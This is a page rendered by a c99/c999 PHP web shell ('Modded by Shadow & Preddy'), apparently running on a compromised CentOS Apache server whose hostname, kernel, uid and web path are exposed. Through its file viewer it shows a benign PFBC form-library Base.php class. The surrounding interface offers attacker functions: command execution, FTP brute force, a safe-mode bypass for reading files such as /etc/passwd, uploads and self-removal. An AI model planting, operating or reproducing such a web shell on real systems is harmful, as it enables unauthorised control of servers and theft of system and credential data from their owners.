!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reportEregis111/PFBC/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.92%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Base.php (3.11 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace PFBC
;

abstract class 
Base {
    public function 
configure(array $properties null) {
        if(!empty(
$properties)) {
            
$class get_class($this);

            
/*The property_reference lookup array is created so that properties can be set
            case-insensitively.*/
            
$available array_keys(get_class_vars($class));
            
$property_reference = array();
            foreach(
$available as $property)
                
$property_reference[strtolower($property)] = $property;

            
/*The method reference lookup array is created so that "set" methods can be called
            case-insensitively.*/
            
$available get_class_methods($class);
            
$method_reference = array();
            foreach(
$available as $method)
                
$method_reference[strtolower($method)] = $method;
            
            foreach(
$properties as $property => $value) {
                
$property strtolower($property);
                
/*Properties beginning with "_" cannot be set directly.*/
                
if($property[0] != "_") {
                    
/*If the appropriate class has a "set" method for the property provided, then
                    it is called instead or setting the property directly.*/
                    
if(isset($method_reference["set" $property]))
                        
$this->$method_reference["set" $property]($value);
                    elseif(isset(
$property_reference[$property]))
                        
$this->$property_reference[$property] = $value;
                    
/*Entries that don't match an available class property are stored in the attributes
                    property if applicable.  Typically, these entries will be element attributes such as
                    class, value, onkeyup, etc.*/
                    
else
                        
$this->setAttribute($property$value);
                }
            }
        }
        return 
$this;
    }

    
/*This method can be used to view a class' state.*/
    
public function debug() {
        echo 
"<pre>"print_r($thistrue), "</pre>";
    }

    
/*This method prevents double/single quotes in html attributes from breaking the markup.*/
    
protected function filter($str) {
        return 
htmlspecialchars($str);
    }

    public function 
getAttribute($attribute) {
        
$value "";
        if(isset(
$this->_attributes[$attribute]))
            
$value =  $this->_attributes[$attribute];

        return 
$value;
    }

    
/*This method is used by the Form class and all Element classes to return a string of html
    attributes.  There is an ignore parameter that allows special attributes from being included.*/
    
public function getAttributes($ignore "") {
        
$str "";
        if(!empty(
$this->_attributes)) {
            if(!
is_array($ignore))
                
$ignore = array($ignore);
            
$attributes array_diff(array_keys($this->_attributes), $ignore);
            foreach(
$attributes as $attribute) {
                
$str .= ' ' $attribute;
                if(
$this->_attributes[$attribute] !== "")
                    
$str .= '="' $this->filter($this->_attributes[$attribute]) . '"';
            }    
        }    
        return 
$str;
    }

    public function 
appendAttribute($attribute$value) {
        if(isset(
$this->_attributes)) {
            if(!empty(
$this->_attributes[$attribute]))
                
$this->_attributes[$attribute] .= " " $value;
            else    
                
$this->_attributes[$attribute] = $value;
        }
    }

    public function 
setAttribute($attribute$value) {
        if(isset(
$this->_attributes))
            
$this->_attributes[$attribute] = $value;
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0159 ]--